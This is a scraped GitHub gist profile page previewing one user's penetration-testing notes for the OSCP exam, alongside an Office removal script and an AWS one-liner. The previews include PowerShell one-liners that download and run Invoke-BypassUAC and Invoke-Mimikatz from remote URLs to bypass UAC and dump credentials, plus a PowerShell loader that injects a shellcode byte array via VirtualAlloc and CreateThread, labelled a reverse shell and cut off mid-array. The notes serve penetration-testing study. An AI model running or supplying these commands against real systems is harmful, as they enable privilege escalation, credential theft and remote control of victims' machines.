Skip to content

Instantly share code, notes, and snippets.

Avatar

Steve Stonebraker ssstonebraker

View GitHub Profile
View OSCP_Windows_Enumeration.md

[TOC]

Windows Initial Checks

Basic Info

hostname
systeminfo
whoami

Global path

If any part of the SYSTEM %PATH% variable is writeable by Authenticated Users, privesc exists

@ssstonebraker
ssstonebraker / remove_office_365_mac.sh
Created Jun 12, 2020
Office 365 Mac 2020 - Delete everything
View remove_office_365_mac.sh
#!/bin/bash
echo " Removing Office 365 apps..."
rm -rf "/Applications/Microsoft Excel.app"
rm -rf "/Applications/Microsoft OneNote.app"
rm -rf "/Applications/Microsoft Outlook.app"
rm -rf "/Applications/Microsoft PowerPoint.app"
rm -rf "/Applications/Microsoft Word.app"
rm -rf "/Applications/Microsoft OneDrive.app"
rm -rf "/Applications/Microsoft Teams.app"
View aws_scripts.md

List accounts in org

aws organizations list-accounts | grep arn | awk -F'/' '{ print $3 }' | awk -F'"' '{ print $1 }'
View Pentest-Service-Enumeration-Screenshots.md

Basic Usage

To view basic usage just type:

pse

image

Listing commands for a service

pse <service-name>
View OSCP_Post_Exploitation.md

Pupy Post Exploitation Toolkit Notes

link to project home: https://github.com/n1nj4sec/pupy

Create aliases - modify pupy.conf

Modify pupy.conf Under the section starting with [aliases] you can add them

[aliases]
View OSCP_Redteam_Powershell_Cheatsheet.md

Description:

Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start     powershell.exe'"

Invoke-Mimikatz: Dump credentials from memory

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

Import Mimikatz Module to run further commands

View OSCP_Password_Cracking.md

Hydra

Supported protocols

List1 list2 list3 list4 list5
asterisk icq oracle-listener rexec snmp
cisco imap[s] oracle-sid rlogin socks5
cisco-enable irc pcanywhere rpcap ssh
View OSCP_Privilege_Escalation.md

Grep for files on disk

grep --binary-files=text -B 2 '99999:7' /dev/sda1
find / -maxdepth 2 -path '/proc' -prune -o -path '/dev' -prune -o -type f -exec grep "proof.txt" {} +

Docker privilege Escalation

@ssstonebraker
ssstonebraker / OSCP_Windows_Powershell_Reverse_Shell.ps1
Last active Jul 6, 2020
oscp windows powershell reverse shell
View OSCP_Windows_Powershell_Reverse_Shell.ps1
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]] $sc = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,
You can’t perform that action at this time.